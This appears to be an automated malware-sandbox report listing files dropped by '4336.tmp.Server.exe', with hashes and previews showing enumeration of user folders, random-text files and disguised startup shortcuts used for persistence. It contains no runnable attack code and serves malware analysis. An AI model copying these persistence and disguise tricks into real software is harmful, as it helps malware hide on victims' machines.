                                                                                                                                                                                                                                Entropy (8bit):5.241470443395582
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:PTIOm5oh9wxOm5pjRmZDKJfOm5pjRSpDKJfOmcTdmcOWz5oPpMcOWz5pjRVpbccU:PbmAwgm/VcDKJmm/VuDKJmmcBYpB/VVe
                                                                                                                                                                                                                                MD5:7F24357FFA354F2471DED45552B897D7
                                                                                                                                                                                                                                SHA1:1DC89FD89BA23EA0186D0D8559B27CF647ECF4DC
                                                                                                                                                                                                                                SHA-256:573E409CB5579533BC387F3943FFFACAF7694269A38B4B56987E8A8B83CF3AD1
                                                                                                                                                                                                                                SHA-512:202F2FC022B7C484E0EDCA890300C471CA3097217A20BF0DDC4E1DC277D411CA3742608302DDB2A0F4E6EAA662D1B741AC2F6A4566C3133A151D0EF83EEDB6A3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:### https://go.microsoft.com/fwlink/?linkid=851546 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 1.### https://go.microsoft.com/fwlink/?LinkId=2106243 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.microsoft.com/
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):821
                                                                                                                                                                                                                                Entropy (8bit):5.2651980330864605
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:EF3IgqkOTRfMnaD/lvsoYduOVdPXrvaI1w0+mwGD/mF3FYdOeeu:ECfbRfBrOuudP3ZrmB4Oeeu
                                                                                                                                                                                                                                MD5:8BB6C23828842E60AD5CED543BF93F9D
                                                                                                                                                                                                                                SHA1:FF35F3F5EBBFEDF9988E1CE74EEFFC16878FAFC6
                                                                                                                                                                                                                                SHA-256:1B720EAD77E6D146B534367355FFE2316046CB071A7DFBC5D41C6E1ED50D1B10
                                                                                                                                                                                                                                SHA-512:AE4BF3525C59F74077FB5041D30AA1AC5FACCA58C8A00B7882B43E3B0457A9C4757723E2F492DF4B9B8AE057710578DF2EFD9BF3183EACEE68A705B62695E5EE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:Desktop\...BPMLNOBVSB\...DVWHKMNFNN\...LTKMYBSEYZ\...ONBQCLYSPU\....HTAGVDFUIE.pdf....KZWFNRXYKI.mp3....LTKMYBSEYZ.jpg....ONBQCLYSPU.docx....UMMBDNEQBN.xlsx....WUTJSCBCFX.png...UOOJJOZIRH\...VLZDGUKUTZ\....FENIVHOIKN.mp3....HTAGVDFUIE.xlsx....KZWFNRXYKI.jpg....NIKHQAIQAU.png....NWTVCDUMOB.pdf....VLZDGUKUTZ.docx...XZXHAVGRAG\....HTAGVDFUIE.mp3....KATAXZVCPS.png....ONBQCLYSPU.xlsx....UMMBDNEQBN.jpg....VLZDGUKUTZ.pdf....XZXHAVGRAG.docx...ZBEDCJPBEY\...ZTGJILHXQB\...desktop.ini...Excel.lnk...FENIVHOIKN.mp3...HTAGVDFUIE.mp3...HTAGVDFUIE.pdf...HTAGVDFUIE.xlsx...KATAXZVCPS.png...KZWFNRXYKI.jpg...KZWFNRXYKI.mp3...LTKMYBSEYZ.jpg...NIKHQAIQAU.png...NWTVCDUMOB.pdf...ONBQCLYSPU.docx...ONBQCLYSPU.xlsx...UMMBDNEQBN.jpg...UMMBDNEQBN.xlsx...VLZDGUKUTZ.docx...VLZDGUKUTZ.pdf...WUTJSCBCFX.png...xj40xovMsm.exe...XZXHAVGRAG.docx..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):834
                                                                                                                                                                                                                                Entropy (8bit):5.30276653598512
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:oF3IgqkOTRfMnaD/lvsoYduOVhvaI1w0+mwGD/mF3FYdOeR:oCfbRfBrOuudZrmB4OeR
                                                                                                                                                                                                                                MD5:3E77FD5851164F7116CA1DE185B21926
                                                                                                                                                                                                                                SHA1:B03D5601F6E6DC15B54F82C854A49C0BCA45214C
                                                                                                                                                                                                                                SHA-256:F71D584001783610360FC7294A824FF60435453CD7304DD204474B505EB70413
                                                                                                                                                                                                                                SHA-512:5A4C0555321CD50086A0A14A57FDDE961E3A95E55944377FF3E9EAFEDE8007001CC842F290EA9B85DD551DC1911CF34E921A417A25CDB2C550BABD0796ED0269
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:Documents\...BPMLNOBVSB\...DVWHKMNFNN\...LTKMYBSEYZ\...My Music\...My Pictures\...My Videos\...ONBQCLYSPU\....HTAGVDFUIE.pdf....KZWFNRXYKI.mp3....LTKMYBSEYZ.jpg....ONBQCLYSPU.docx....UMMBDNEQBN.xlsx....WUTJSCBCFX.png...UOOJJOZIRH\...VLZDGUKUTZ\....FENIVHOIKN.mp3....HTAGVDFUIE.xlsx....KZWFNRXYKI.jpg....NIKHQAIQAU.png....NWTVCDUMOB.pdf....VLZDGUKUTZ.docx...XZXHAVGRAG\....HTAGVDFUIE.mp3....KATAXZVCPS.png....ONBQCLYSPU.xlsx....UMMBDNEQBN.jpg....VLZDGUKUTZ.pdf....XZXHAVGRAG.docx...ZBEDCJPBEY\...ZTGJILHXQB\...desktop.ini...FENIVHOIKN.mp3...HTAGVDFUIE.mp3...HTAGVDFUIE.pdf...HTAGVDFUIE.xlsx...KATAXZVCPS.png...KZWFNRXYKI.jpg...KZWFNRXYKI.mp3...LTKMYBSEYZ.jpg...NIKHQAIQAU.png...NWTVCDUMOB.pdf...ONBQCLYSPU.docx...ONBQCLYSPU.xlsx...UMMBDNEQBN.jpg...UMMBDNEQBN.xlsx...VLZDGUKUTZ.docx...VLZDGUKUTZ.pdf...WUTJSCBCFX.png...XZXHAVGRAG.docx..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):338
                                                                                                                                                                                                                                Entropy (8bit):5.285684426154722
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:3tSLKJswhjzAhjHs1j0/eyPcMuhOLt7ydsd+kGDysmFEKTFYd/r53raj7IsNubSM:QLKJsqvaI1w/8wLmwGDysmFEKTFYdjxL
                                                                                                                                                                                                                                MD5:8309266C95CA0536FA7C7D24DD510A68
                                                                                                                                                                                                                                SHA1:1B5FEF428E41596A839B7C8C5113F351562C7F86
                                                                                                                                                                                                                                SHA-256:70FEC1166A36BC10FD82C09C5380E24DA6E673AD02CCC57110501684865360C8
                                                                                                                                                                                                                                SHA-512:0761522F3023B5E91636645F0CC2807B1DA8AB42D25036FD0259811F8D8CABDC6107AD3253690B377CD997849C031B46DAB14D494C5597E3D55905A2622D4215
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:Downloads\...desktop.ini...FENIVHOIKN.mp3...HTAGVDFUIE.mp3...HTAGVDFUIE.pdf...HTAGVDFUIE.xlsx...KATAXZVCPS.png...KZWFNRXYKI.jpg...KZWFNRXYKI.mp3...LTKMYBSEYZ.jpg...NIKHQAIQAU.png...NWTVCDUMOB.pdf...ONBQCLYSPU.docx...ONBQCLYSPU.xlsx...UMMBDNEQBN.jpg...UMMBDNEQBN.xlsx...VLZDGUKUTZ.docx...VLZDGUKUTZ.pdf...WUTJSCBCFX.png...XZXHAVGRAG.docx..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):25
                                                                                                                                                                                                                                Entropy (8bit):4.023465189601646
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:1hiR8LKB:14R8LKB
                                                                                                                                                                                                                                MD5:966247EB3EE749E21597D73C4176BD52
                                                                                                                                                                                                                                SHA1:1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
                                                                                                                                                                                                                                SHA-256:8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
                                                                                                                                                                                                                                SHA-512:BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:OneDrive\...desktop.ini..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):88
                                                                                                                                                                                                                                Entropy (8bit):4.450045114302317
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
                                                                                                                                                                                                                                MD5:D430E8A326E3D75F5E49C40C111646E7
                                                                                                                                                                                                                                SHA1:D8F2494185D04AB9954CD78268E65410768F6226
                                                                                                                                                                                                                                SHA-256:22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
                                                                                                                                                                                                                                SHA-512:1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):180
                                                                                                                                                                                                                                Entropy (8bit):4.5224726418616354
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:jgBLKeUWCgovXAsHL4/ovXASt0dAgovXAgH+t4/ovXAg+LNL0ovXA+OcwKovn:j4LKdsovXAsr4/ovXA/d/ovXAgeIovXR
                                                                                                                                                                                                                                MD5:2BF23DFFD4049B0B64D28F7FC1A78C81
                                                                                                                                                                                                                                SHA1:36741B2AED9716DEB9E134102496A972E88101D2
                                                                                                                                                                                                                                SHA-256:579028C4D5F59005F70DE46A4BF93790145FC6EED73CF4EB12549D0004F08227
                                                                                                                                                                                                                                SHA-512:37E2B67F31946567FF2E31EB8E401E1C1A16EAC5C8BED0A097B5FF2653D18358CA019E052BD4758501F326B87352D91B5BB315F1E9DD1CCB4375829DCFEDEE4E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:Startup\...desktop.ini...psvhost.exe.lnk...Service_Adobe.exe.lnk...Service_com.adobe.dunamis.exe.lnk...Service_Microsoft.exe.lnk...Service_Mozilla.exe.lnk...Service_Skype.exe.lnk..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4570
                                                                                                                                                                                                                                Entropy (8bit):5.351072362013411
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:4jzcRPTmt6qESfsNwThEfY0Vr6ZxqdhewmbIGVpN7lIdkDU9mC6BlOdswiNI00bi:BtbSkdr6ZoTYUKIq
                                                                                                                                                                                                                                MD5:974402A95AB98D86018E4C2EA60AE153
                                                                                                                                                                                                                                SHA1:8CFB565C19C609D9607F5625483DE2C631FF00A8
                                                                                                                                                                                                                                SHA-256:D5D957F49B767A1E30A20DA5261C97C8E50105D69DAA66C18B011B3BBC2BEFD4
                                                                                                                                                                                                                                SHA-512:C84EFC89E90926630DB77585F4D35424638D54C63DCD8DE9614CACA61C1B27389B972F06CED8AECD797D537EA060DD0AD4CC09446B4ED36743B91F9DCCB0ADF3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-00-50-743.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-01-22-078.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696334775820156800_6EB929AF-656E-4F43-9731-EA7753E1F1BD.log.....App1696334923056622400_BD966DD2-7850-423A-B1D8-7882CE1A6D15.log.....App1696417072488237400_C12D9B44-3468-47BC-9418-BF0A674A2B2F.log.....App1696417101742322600_290EFEE9-C25A-4857-9F32-D7E6D51B7C09.log.....App1696417118050662300_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App1696417118051710600_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App_1696413198165042300_AA3FCB9C-CF1A-4407-8A94-A7D6C220021F.log...Low\...mozilla-temp-files\...Symbols\....ntkrnlmp.pdb\.....68A17FAF3012B7846079AEECDBE0A5831\......download.error......ntkrnlmp.pdb....winload
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):23
                                                                                                                                                                                                                                Entropy (8bit):3.7950885863977324
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:k+JrLKB:k+JrLKB
                                                                                                                                                                                                                                MD5:1FDDBF1169B6C75898B86E7E24BC7C1F
                                                                                                                                                                                                                                SHA1:D2091060CB5191FF70EB99C0088C182E80C20F8C
                                                                                                                                                                                                                                SHA-256:A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
                                                                                                                                                                                                                                SHA-512:20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:Videos\...desktop.ini..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
